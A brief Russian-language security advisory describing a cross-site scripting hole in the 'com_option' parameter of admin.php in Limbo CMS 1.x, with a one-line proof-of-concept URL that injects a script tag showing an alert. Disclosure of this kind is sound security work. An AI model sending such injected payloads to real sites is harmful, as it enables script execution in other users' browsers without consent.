Программа: Limbo 1.x

Уязвимость позволяет удаленному пользователю выполнить
XSS нападение на целевую систему. Уязвимость существует
из-за недостаточной обработки входных данных в параметре "com_option" сценарием
admin.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.

Пример:

admin.php?com_option=>"’><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>



Оставить мнение